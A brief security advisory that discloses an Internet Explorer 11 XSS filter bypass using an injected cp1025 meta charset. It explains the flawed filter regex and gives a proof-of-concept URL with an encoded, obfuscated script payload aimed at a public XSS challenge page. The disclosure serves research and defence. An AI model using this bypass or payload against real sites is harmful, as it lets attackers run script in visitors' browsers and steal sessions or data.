#Vulnerability: IE 11 XSS Filter Bypass #Impact: Moderate #Authors: Rafay Baloch #Company: RHAInfoSec #Website: http://rafayhackingarticles.net #version: Latest Description Internet explorer 11 Suffers from a XSS Filter bypass using cp1025 charset. This is highly effective when the charset has not been set by the webmaster. The issue occurs due to the fact that in the regular expressions authors are trying to filter "http-equiv" instead of filtering out the "<meta charset" keyword. Proof of Concept The following is the Proof of concept: http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=cp1025%3E%27%20L%C9%86%D9%81%D4%85%40%C9%84~[%40%D6%95%D4%96%E4%A2%85%D6%A5%C5%99~m~%60JZ^NNm^mm~mNm^mmmm~mmNmm^mmmmmm~mmmmNmm^[JMOO}}N}}]JmZNMOO}}N}}]JmmZNMOO}}N}}]JmmmmZNMO}}N}}]JmZNM[N}}]JmmmmmmZZMm]n